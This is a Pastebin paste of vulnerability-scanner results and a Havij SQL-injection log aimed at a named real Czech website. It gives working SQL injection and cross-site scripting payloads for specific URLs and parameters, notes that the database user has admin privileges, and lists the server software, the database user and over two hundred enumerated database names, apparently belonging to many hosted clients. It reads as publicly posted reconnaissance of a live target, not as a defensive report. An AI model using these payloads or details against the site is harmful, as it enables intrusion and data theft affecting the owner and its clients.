Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Boolean Based SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=-1 OR 17-7=10
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- |||
- [High Possibility] SQL Injection
- Severity : Critical
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- |||
- XSS - Cross-site Scripting
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/form_movite.php?id_form=157'"--></style></script><script>alert(0x0001E7)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: id_form
- Parameter Type: Querystring
- Attack Pattern: 157'"--></style></script><script>alert(0x0001E7)</script>
- -
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/form_movite.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: e_mail
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000265)</script>
- -
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/form_movite.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: fax
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x000269)</script>
- |||
- Database User Has Admin Privileges
- Severity : Important
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=-1 OR 17-7=10
- Vulnerability Classifications: OWASP A6 CWE-16
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: -1 OR 17-7=10
- |||
- PHP Version Disclosure
- Severity : Low
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/
- Vulnerability Classifications: PCI 6.5.6 OWASP A6
- Extracted Version: PHP/5.2.0-8+etch11
- |||
- Database Error Message
- Severity : Low
- Confirmation : Confirmed
- Detection Accuracy :
- Vulnerable URL : http://www.exekutorbelasta.cz/show_movitosti.php?id=%27
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: id
- Parameter Type: Querystring
- Attack Pattern: %27
- |||
- Havij log.
- Target: http://www.exekutorbelasta.cz/show_movitosti.php?id=-1 OR 17-7=10
- Web Server: Apache
- Powered-by: PHP/5.2.0-8+etch11
- DB Server: MySQL
- Current User: radek@localhost
- Sql Version: 5.0.32-Debian_7etch12
- Current DB: belasta
- System User: radek@localhost
- Installation dir: /usr/
- Data Bases: information_schema
- agroteam
- akce
- ankety
- asean
- autocentrum1
- avscr
- bauer
- bazar
- belasta
- belgbau
- beryreisen
- ceskakariera
- ceskebazary
- ceskebazary2
- ceskestavby
- ceskyinternet
- ceskyinternet_firma
- ceskyseznam
- ceskyslovnik
- ciselniky_adresy
- ciselniky_cizi
- clanky
- couf
- ctecka
- detskysvet
- diskuse
- dstechnik
- dstechnik2005
- dstechnik_obchod
- dstechnik_test
- edovolena
- edovolena-old
- efotbal
- emucouf
- fotogalerie
- ft
- gastro
- gepardsport
- gkcb
- homestar
- hotelypensiony
- importy
- inpress
- intext
- ispell
- italskynabytek
- ivo
- jcdivadlo
- jcdivadlo2
- jckpu
- klienti
- komplex
- konik
- kontaktgroup
- kontroly
- lost+found
- management
- margarita
- montplast
- mysql
- navstevnici
- neptun
- neptun2
- neptunold
- novinkysortiment
- obce
- pensionnovak
- pohony
- pole
- poptavky
- ppzelec
- produkty
- pujcovna
- radek
- reality
- reate
- reklama
- reklama_stavby
- ridingwasps
- rostliny
- rozkrock
- saggita
- seacom
- seznamka
- seznamka_a1
- she
- shop
- shop2
- slovnikpojmu
- sortimentnovinky
- sport
- stajdita
- staroceskydvur
- stat_2003
- stat_2003_akce
- stat_2003_bazar
- stat_2003_clanky
- stat_2003_devprojekty
- stat_2003_firmy
- stat_2003_fotoinspirace
- stat_2003_pujcovna
- stat_2003_shop
- stat_2003_typovedomy
- stat_2003_zbozi
- stat_2004
- stat_2004_akce
- stat_2004_bazar
- stat_2004_clanky
- stat_2004_devprojekty
- stat_2004_firmy
- stat_2004_fotoinspirace
- stat_2004_pujcovna
- stat_2004_shop
- stat_2004_typovedomy
- stat_2004_zbozi
- stat_2005
- stat_2005_akce
- stat_2005_bazar
- stat_2005_clanky
- stat_2005_devprojekty
- stat_2005_firmy
- stat_2005_fotoinspirace
- stat_2005_pujcovna
- stat_2005_shop
- stat_2005_typovedomy
- stat_2005_zbozi
- stat_2006
- stat_2006_akce
- stat_2006_bazar
- stat_2006_clanky
- stat_2006_devprojekty
- stat_2006_firmy
- stat_2006_fotoinspirace
- stat_2006_pujcovna
- stat_2006_shop
- stat_2006_typovedomy
- stat_2006_zbozi
- stat_2007
- stat_2007_akce
- stat_2007_bazar
- stat_2007_clanky
- stat_2007_devprojekty
- stat_2007_firmy
- stat_2007_fotoinspirace
- stat_2007_pujcovna
- stat_2007_shop
- stat_2007_typovedomy
- stat_2007_zbozi
- stat_2008
- stat_2008_akce
- stat_2008_bazar
- stat_2008_clanky
- stat_2008_devprojekty
- stat_2008_firmy
- stat_2008_fotoinspirace
- stat_2008_pujcovna
- stat_2008_shop
- stat_2008_typovedomy
- stat_2008_zbozi
- stat_2009
- stat_2009_akce
- stat_2009_bazar
- stat_2009_clanky
- stat_2009_devprojekty
- stat_2009_firmy
- stat_2009_fotoinspirace
- stat_2009_pujcovna
- stat_2009_shop
- stat_2009_typovedomy
- stat_2009_zbozi
- stat_2010
- stat_2010_akce
- stat_2010_bazar
- stat_2010_clanky
- stat_2010_devprojekty
- stat_2010_firmy
- stat_2010_fotoinspirace
- stat_2010_pujcovna
- stat_2010_shop
- stat_2010_typovedomy
- stat_2010_zbozi
- stat_2011
- stat_2011_akce
- stat_2011_bazar
- stat_2011_clanky
- stat_2011_devprojekty
- stat_2011_firmy
- stat_2011_fotoinspirace
- stat_2011_pujcovna
- stat_2011_shop
- stat_2011_typovedomy
- stat_2011_zbozi
- stat_2012
- stat_2012_akce
- stat_2012_bazar
- stat_2012_clanky
- stat_2012_devprojekty
- stat_2012_firmy
- stat_2012_fotoinspirace
- stat_2012_pujcovna
- stat_2012_shop
- stat_2012_typovedomy
- stat_2012_zbozi
- stat_2013
- stat_2013_akce
- stat_2013_bazar
- stat_2013_clanky
- stat_2013_devprojekty
- stat_2013_firmy
- stat_2013_fotoinspirace
- stat_2013_pujcovna
- stat_2013_shop
- stat_2013_typovedomy
- stat_2013_zbozi
- stat_2014
- stat_2014_akce
- stat_2014_bazar
- stat_2014_clanky
- stat_2014_devprojekty
- stat_2014_firmy
- stat_2014_fotoinspirace
- stat_2014_pujcovna
- stat_2014_shop
- stat_2014_typovedomy
- stat_2014_zbozi
- stat_2015
- stat_2015_akce
- stat_2015_bazar
- stat_2015_clanky
- stat_2015_devprojekty
- stat_2015_firmy
- stat_2015_fotoinspirace
- stat_2015_pujcovna
- stat_2015_shop
- stat_2015_typovedomy
- stat_2015_zbozi
- stat_hotely_2006
- stat_hotely_2007
- stat_hotely_2008
- stat_hotely_2009
- stat_hotely_2010
- stat_kariera_2007
- stat_kariera_2008
- stat_kariera_2009
- stat_kariera_2010
- stat_seznam_2009
- stat_seznam_2010
- stat_stavby_2004
- stat_stavby_2005
- stat_stavby_2006
- stat_stavby_2007
- stat_stavby_2008
- stat_stavby_2009
- stat_stavby_2010
- stat_summary
- statistika
- statistiky
- statistiky2
- statistiky_test
- temp
- test
- test2
- test_db1
- test_db2
- testuser
- therme
- top_obchod
- toyotacb
- trimcon
- uniprojekta
- urlci
- uzivatele
- vaseparfemy
- vasezajezdy
- verba
- vratny
- vyvoj
- wb0015
- willow
- xj
- zazvorkova
- zdeco
- zemesveta
- zeppelin
- |||
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement